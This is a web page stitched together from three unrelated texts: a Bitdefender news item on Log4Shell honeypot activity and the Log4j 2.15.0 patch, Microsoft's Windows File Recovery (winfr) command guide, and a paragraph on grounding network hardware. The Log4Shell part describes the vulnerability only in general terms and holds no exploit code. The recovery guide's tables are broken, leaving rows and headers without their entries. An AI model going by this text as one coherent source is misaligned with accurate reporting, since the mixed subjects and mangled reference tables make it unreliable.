Bitdefender Honeypots Signal Active Log4Shell 0-Day Attacks Underway; Patch Immediately
Log4Shell is a 0-day vulnerability in the Log4j Java library that allows attackers to download and run scripts on targeted servers, leaving them open to complete remote control. After a user posted a proof-of-concept (PoC) on Twitter, Bitdefender’s honeypots started to register attacks using the PoC, underlining just how severe this vulnerability is.
Log4j is not just another Java library. It’s embedded in servers and services from all over the world, used by companies such as Apple, Amazon, Cloudflare, Steam, various Apache server types, ElasticSearch, and many others.
As 0-day vulnerabilities go, Log4Shell (CVE-2021-44228) has a 10/10 rating, which means that attackers can remotely exploit it without any input from the victim, and it doesn’t require high-level technical expertise to pull it off.
The Apache Software Foundation issued an emergency patch, and now Log4j 2.15.0 is available to everyone.
“JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default,” explain the developers in the release notes.
It’s difficult to estimate the massive impact Log4Shell will have because historically patches (even for high-severity threats) take time for everyone to apply, if ever. We commonly see attacks successfully executed using fixed vulnerabilities that are two or three years old.
Immediately after the Log4Shell PoC was released, adversaries started scanning the Internet, looking for vulnerable targets. Bitdefender honeypots are seeing attackers trying to compromise different web services. The number of total scans using Log4Shell has increased three-fold in a single day meaning we most likely are just at the beginning. While most scans don’t have a particular target, around 20 percent of the attempts seem to search for vulnerable Apache Solr services.
When Bitdefender’s global honeypot network experiences a marked spike in activity, it usually means attackers are actively looking for ways to weaponize a newly discovered vulnerability as soon as possible. Most of the scans we are seeing now are coming from Russia-based IP addresses.
Bitdefender recommends all companies using the Log4j library upgrade as soon as possible to the latest version. The traffic generated in the honeypots indicates that attackers know about the vulnerability and how widespread the library is. We believe we’re witnessing only the start of a very long campaign.
If you can’t locate a lost file from your backup, then you can use Windows File Recovery, which is a command line app available from the Microsoft Store. Use this app to try to recover lost files that have been deleted from your local storage device (including internal drives, external drives, and USB devices) and can’t be restored from the Recycle Bin. Recovery on cloud storage and network file shares is not supported.
If you want to increase your chances of recovering a file, minimize or avoid using your computer. In the Windows file system, the space used by a deleted file is marked as free space, which means the file data can still exist and be recovered. But any use of your computer can create files, which may over-write this free space at any time.
How to recover and restore lost files on Windows 10
Press the Windows key, enter Windows File Recovery in the search box, and then select Windows File Recovery.
When you are prompted to allow the app to make changes to your device, select Yes.
In the Command Prompt window,enter the command in the following format:winfr source-drive: destination-drive: [/switches] The source and destination drives must be different. When recovering from the operating system drive (often C: ), use the /n <filter> and /y:<type<(s)> switches to specify the user files or folder.
Microsoft automatically creates a recovery folder for you called, Recovery_<date and time> on the destination drive.
There are three modes you can use to recover files: Default, Segment, and Signature.
Default mode examples
Recover a specific file from your C: drive to the recovery folder on an E: drive.winfr C: E: /n \Users\<username>\Documents\QuarterlyStatement.docx Recover jpeg and png photos from your Pictures folder to the recovery folder on an E: drive.winfr C: E: /n \Users\<username>\Pictures\*.JPEG /n \Users\<username>\Pictures\*.PNG Recover your Documents folder from your C: drive to the recovery folder on an E: drive.winfr C: E: /n \Users\<username>\Documents\ Don’t forget the backslash (\) at the end of the folder.
Segment mode examples (/r)
Recover PDF and Word files from your C: drive to the recovery folder on an E: drive.winfr C: E: /r /n *.pdf /n *.docx Recover any file with the string “invoice” in the filename by using wildcard characters.winfr C: E: /r /n *invoice* Signature mode examples (/x)
When using signature mode, it’s helpful to first see the supported extension groups and corresponding file types.winfr /# Recover JPEG (jpg, jpeg, jpe, jif, jfif, jfi) and PNG photos from your C: drive to the recovery folder on an E: drive.winfr C: E: /x /y:JPEG,PNG Recover ZIP files (zip, docx, xlsx, ptpx, and so on) from your C: drive to the recovery folder on an E: drive.winfr C: E:\RecoveryTest /x /y:ZIP
When you are prompted for confirmation to continue, enter Y to start the recovery operation.
Depending on the size of your source drive, this may take a while.
To stop the recovery process, press Ctrl+C.
About modes and file systems
The following information can help you decide which file system you have and which mode to use.
There are several file systems supported by Windows that vary depending on the storage device or operating system. Recovering files from non-NTFS file systems is only supported in signature mode. To see which file system you have, right click a drive in File Explorer and select Properties.
FAT and exFAT
SD cards, Flash or USB drives (< 4GB)
Windows Server and Windows Pro for Workstations
Computers (HDD, SSD), external hard drives, flash or USB drives (> 4GB)
Deciding which mode to use
Use the following table to help you decide which mode to use. If you’re not sure, start with the default mode.
Deleted a while ago
First try Segment, then Signature
After formatting a disk
A corrupted disk
FAT, exFAT, ReFS
Recovery file type is supported (See following table)
Signature mode extension groups and file types
The following table summarizes the extension groups and the supported file types for each group when you use the /y:<type(s)> switch:
The following table summarizes what each basic command line parameter and switch is used for.
Parameter or switch
Specifies the storage device where the files were lost. Must be different from the destination-drive.
Specifies the storage device and folder on which to put the recovered files. Must be different from the source-drive.
Uses segment mode, which examines File Record Segments (FRS).
Scans for a specific file by using a file name, file path, or wildcards. For example:File name: /n myfile.docxFile path: /n /users/<username>/Documents/Wildcard: /n myfile.* /n *.docx /n *<string>*
Uses signature mode, which examines file types and works on all file systems.
Scans for files with specific file types. Separate multiple entries by using commas. For a list of extension groups and corresponding file types, see the table, “Signature mode extension groups and file types” in the section, “About modes and file systems”.
Shows signature mode extension groups and corresponding file types in each group.
Shows a quick summary of syntax and switches for general users.
Shows a quick summary of syntax and switches for advanced users.
Frequently asked questions
Can you give some tips to help me use correct syntax?
Here are some suggestions:
Always use drive letters in the source and destination path, don’t forget the colon (:) after the drive letter, and make sure there is a space between the source and destination.
If a switch has a colon, such as /y:, don’t add a space between the colon and the rest of the value.
When you specify just a folder name, such as /n \Myfolder\, add a backslash (\) at the end of it.
If a file or folder name has spaces, surround it with quotes. For example: winfr C: E: /n "\Users\<username>\Documents\Quarterly Statement.docx"
To stop the recovery process, press Ctrl+C.
What does <username> mean in the command examples?
In the File Explorer address bar, enter C:\users to see a list of potential users on your computer. There may be several users on your computer, including you, the administrator, and the default account. When you see <username> in a file path, it is a placeholder for the current username on your computer.
Why am I getting this message: “Source and Destination cannot refer to the same physical partition?”
The source and destination drive or partition path should not be the same. If you only have one drive, use a USB or external hard drive as your destination path. Don’t create a partition after losing data, because this reduces the chance of a successful recovery.
Why does the recovery operation take so long?
Depending on the size of the disk, it may take some time to recover the file, especially if you are using signature mode.
Why are additional files recovered from my operating system drive?
Behind the scenes, Windows is constantly creating and deleting files. By default, Windows File Recovery filters out these files, but some slip through. To prevent this, use the /n <filter> switch in default and segment modes and the /y:<type(s)> switch in signature mode.
What is the $Recycle.Bin folder?
For default and segment modes, you may also see lost files recovered from the Recycle Bin (files either in the recycle bin or that were permanently deleted) with the name $files.xxx and stored in a folder called $RECYCLE.BIN.
What happens if the destination drive is full?
If you see the following message: “Destination disk is full, please free up space before resuming: (R)esume, (S)kip file, or (A)bort”, Free up drive space on the destination drive, and then choose one of the options.
I was not able to recover the file, now what?
If you used default or segment mode, try again in signature mode if the file type is supported. It’s possible that the free space was over-written, especially on a solid state drive (SSD). If you need help, contact your administrator.
Command line syntax
The following table summarizes what each advanced switch is used for.
Saves a log file of the recovery operation in a different location than the default location on the recovery drive (for example, D:\logfile).
Overrides user prompts, which is useful in a script file.
Recovers undeleted files, for example, from the Recycle Bin.
Recovers system files.
Specifies whether to always (a), never (n), orkeep both always(b) when choosing whether to overwrite a file. The default action is to prompt to overwrite.
Recovers files without primary data streams.
To keep your results manageable and focus on user files, some file types are filtered by default, but this switch removes that filter. For a complete list of these file types, see the information after this table.
Specifies which file types are filtered. For a complete list of these file types, see the information after this table.
Specifies the number of sectors on the source device. To find sector information, use fsutil.
Specifies the cluster size (allocation unit) on the source device.
Specifies the first sector on the source device to start the scan operation, for example, to bypass unusable sectors. To find sector information, use fsutil.
File extension filter list
The following file types are filtered from results by default. Use the /e switch to disable this filter or the /e:<extension> filter to specify file types not to filter.
As you use the Windows File Recovery app, it’s often helpful to understand what’s going on “under the hood” of a storage device.
The three modes of operation
The three modes work in the following way:
Default mode This mode uses the Master File Table (MFT) to locate lost files. Default mode works well when the MFT and file segments, also called File Record Segments (FRS), are present.
Segment mode This mode does not require the MFT but does require segments. Segments are summaries of file information that NTFS stores in the MFT such as name, date, size, type and the cluster/allocation unit index.
Signature mode This mode only requires that the data is present and searches for specific file types. It doesn’t work for small files. To recover a file on an external storage device, such as a USB drive, you can only use Signature mode.
How a storage device is organized
The bytes on a storage device are organized into clusters and sectors. A cluster is the smallest amount of disk space that can be allocated for a file. A sector is a unit of storage on a storage device. NTFS organizes disks based on cluster size, which is determined by the number of sectors in a cluster. On NTFS, clusters start at 0 and are numbered sequentially from the beginning of the partition into logical cluster numbers.
The default cluster size varies depending on the capacity of the storage device:
7 to 512 MB
513 to 1,024 MB
1,025 MB to 2 GB
2 GB to 2 TB
The NTFS file system
New Technology File System (NTFS) is the default file system in Windows. NTFS organizes files by using a well-defined structure to describe how files are stored, what information to include, and how to locate the files. A critical element is the Master File Table (MFT), which is a table made up of one row for each file and several columns of file attributes. This row is the File Record Segment (FRS). The MFT is like a table of contents for every file on the storage device. NTFS also keeps a backup of the MFT in case the original MFT becomes unusable.
Settings, such as read-only and archive, file creation and modification dates, and so on.
The name of the file including the MS-DOS short name.
The contents of the file if it’s small.
Information about the file allocation.
Additional attributes include file type, permissions, size, and file path.
Proper earthing or grounding of the key network infrastructure parts (catalysts) would ensure the reliability, availability and integrity of the functional operating ICT business support the LAN and wireless network are providing to all parts involved in the OSI levels. From infrastructure to system to application and to user presentation.
Sadly, it’s predominantly the small / medium size businesses that suffer by not getting it right the first time. Largely due to the misconception of saving money or reducing costs by trusting unqualified, cheaper, IT consultants and practitioners and paying dearly in starting over, data loss, operations lost time and in some cases, catastrophic failure.
Also, not realizing the importance of having a long term ICT strategy and business plan that’s flexible and that supports the business development vision and agenda of the business owner.